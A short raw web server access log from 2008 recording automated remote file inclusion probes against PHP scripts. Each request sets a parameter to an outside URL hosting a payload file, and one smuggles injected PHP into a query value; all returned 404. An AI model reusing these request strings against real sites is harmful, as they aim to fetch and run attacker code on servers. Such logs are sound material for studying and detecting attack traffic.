212.115.37.130 - - [07/Aug/2008:07:15:34 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 302 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
203.56.255.14 - - [07/Aug/2008:07:15:39 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
203.56.255.14 - - [07/Aug/2008:07:15:39 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
87.226.77.5 - - [07/Aug/2008:07:16:49 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.812"
